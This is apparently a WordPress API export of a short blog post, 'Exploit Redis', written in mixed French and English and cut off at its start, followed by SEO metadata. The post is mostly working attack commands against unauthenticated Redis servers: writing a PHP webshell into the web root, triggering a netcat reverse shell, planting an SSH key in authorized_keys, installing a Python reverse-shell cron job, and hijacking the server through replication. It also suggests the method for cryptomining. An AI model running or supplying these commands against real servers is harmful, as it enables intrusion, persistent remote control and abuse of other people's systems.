\nredis-cli -h 10.9.0.19\nconfig set dir \/var\/www\/html\nconfig set dbfilename shell.php\nset test "<?php system($_GET['cmd']);?>\nhttp:\/\/10.9.0.19\/shell.php?cmd=nc 10.9.0.15 4444 -e \/bin\/sh \n<\/code><\/pre><\/p>\nS’il y a un exception, vous pouvez r\u00e9essayer apr\u00e8s avoir fait un backup et vid\u00e9 la base de donn\u00e9es. Ne pas oublier de restorer la bd<\/p>\n
Get Webshell
\n\u200b You must know the physical path of the Web site<\/p>\n
root@kali:~# redis-cli -h 10.85.0.52
\n
10.85.0.52:6379> config set dir \/usr\/share\/nginx\/html\nOK\n10.85.0.52:6379> config set dbfilename redis.php\nOK\n10.85.0.52:6379> set test "<?php phpinfo(); ?>"\nOK\n10.85.0.52:6379> save\nOK<\/code><\/pre>
\n\u200b If the webshell access exception, you can empty the database after backup and try again, remember to restore the database<\/p>\nGet SSH\u2013Crackit
\nGenerate a ssh public-private key pair on your pc: ssh-keygen -t rsa<\/p>\n
Write the public key to a file : (echo -e \u201c\\n\\n\u201d; cat .\/.ssh\/id_rsa.pub; echo -e \u201c\\n\\n\u201d) > foo.txt<\/code><\/p>\nImport the file into redis : cat foo.txt | redis-cli -h 10.85.0.52 -x set crackit<\/code><\/p>\nSave the public key to the authorized_keys file on redis server :<\/p>\n
root@kali:~# redis-cli -h 10.85.0.52\n10.85.0.52:6379> config set dir \/home\/test\/.ssh\/\nOK\n10.85.0.52:6379> config set dbfilename "authorized_keys"\nOK\n10.85.0.52:6379> save\nOK<\/code><\/pre>
\nFinally, you can ssh to the redis server with private key : ssh -i id_rsa test@10.85.0.52<\/code><\/p>\nGet Reverse Shell\u2014Crontab
\n
root@kali:~# echo -e "\\n\\n*\/1 * * * * \/usr\/bin\/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"10.85.0.53\\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"\/bin\/sh\\",\\"-i\\"]);'\\n\\n"|redis-cli -h 10.85.0.52 -x set 1\nOK\nroot@kali:~# redis-cli -h 10.85.0.52 config set dir \/var\/spool\/cron\/crontabs\/\nOK\nroot@kali:~# redis-cli -h 10.85.0.52 config set dbfilename root\nOK\nroot@kali:~# redis-cli -h 10.85.0.52 save\nOK<\/code><\/pre>
\nThe above command for Ubuntu, Centos need to be adjusted to\uff1a<\/p>\nredis-cli -h 10.85.0.52 config set dir \/var\/spool\/cron\/<\/code><\/p>\nThis method can also be used to earn bitcoin \uff1ayam<\/p>\n
Master-Slave Module
\n\u200b The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis.<\/p>\n
master redis : 10.85.0.51 (Hacker’s Server)
\nslave redis : 10.85.0.52 (Target Vulnerability Server)
\nA master-slave connection will be established from the slave redis and the master redis:
\n
redis-cli -h 10.85.0.52 -p 6379\nslaveof 10.85.0.51 6379<\/code><\/pre>
\nThen you can login to the master redis to control the slave redis:
\nredis-cli -h 10.85.0.51 -p 6379\nset mykey hello\nset mykey2 helloworld<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"redis-cli -h 10.9.0.19 config set dir \/var\/www\/html config set dbfilename shell.php set test "<?php system($_GET);?> http:\/\/10.9.0.19\/shell.php?cmd=nc 10.9.0.15 4444 -e \/bin\/sh S’il y a un exception, vous pouvez r\u00e9essayer apr\u00e8s avoir fait un backup et vid\u00e9 la base de donn\u00e9es. Ne pas oublier de restorer la bd Get Webshell \u200b You must know the physical path of the Web site root@kali:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir \/usr\/share\/nginx\/html OK 10.85.0.52:6379> config set dbfilename redis.php OK 10.85.0.52:6379> set test "<?php phpinfo(); ?>" OK 10.85.0.52:6379> save OK \u200b If the webshell access exception, you can empty the database after backup and try <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"yoast_head":"\n
Exploit Redis - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Exploit Redis - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"redis-cli -h 10.9.0.19 config set dir \/var\/www\/html config set dbfilename shell.php set test "<?php system($_GET);?> http:\/\/10.9.0.19\/shell.php?cmd=nc 10.9.0.15 4444 -e \/bin\/sh S’il y a un exception, vous pouvez r\u00e9essayer apr\u00e8s avoir fait un backup et vid\u00e9 la base de donn\u00e9es. Ne pas oublier de restorer la bd Get Webshell \u200b You must know the physical path of the Web site root@kali:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir \/usr\/share\/nginx\/html OK 10.85.0.52:6379> config set dbfilename redis.php OK 10.85.0.52:6379> set test "<?php phpinfo(); ?>" OK 10.85.0.52:6379> save OK \u200b If the webshell access exception, you can empty the database after backup and try\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-02T02:42:48+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-02T03:32:49+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/\",\"name\":\"Exploit Redis - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-07-02T02:42:48+00:00\",\"dateModified\":\"2021-07-02T03:32:49+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Exploit Redis\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Exploit Redis - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/","og_locale":"fr_CA","og_type":"article","og_title":"Exploit Redis - S\u00e9curiser votre site","og_description":"redis-cli -h 10.9.0.19 config set dir \/var\/www\/html config set dbfilename shell.php set test "<?php system($_GET);?> http:\/\/10.9.0.19\/shell.php?cmd=nc 10.9.0.15 4444 -e \/bin\/sh S’il y a un exception, vous pouvez r\u00e9essayer apr\u00e8s avoir fait un backup et vid\u00e9 la base de donn\u00e9es. Ne pas oublier de restorer la bd Get Webshell \u200b You must know the physical path of the Web site root@kali:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir \/usr\/share\/nginx\/html OK 10.85.0.52:6379> config set dbfilename redis.php OK 10.85.0.52:6379> set test "<?php phpinfo(); ?>" OK 10.85.0.52:6379> save OK \u200b If the webshell access exception, you can empty the database after backup and try","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-07-02T02:42:48+00:00","article_modified_time":"2021-07-02T03:32:49+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/","name":"Exploit Redis - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-07-02T02:42:48+00:00","dateModified":"2021-07-02T03:32:49+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/01\/exploit-redis\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Exploit Redis"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/488"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=488"}],"version-history":[{"count":5,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/488\/revisions"}],"predecessor-version":[{"id":491,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/488\/revisions\/491"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=488"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=488"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=488"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}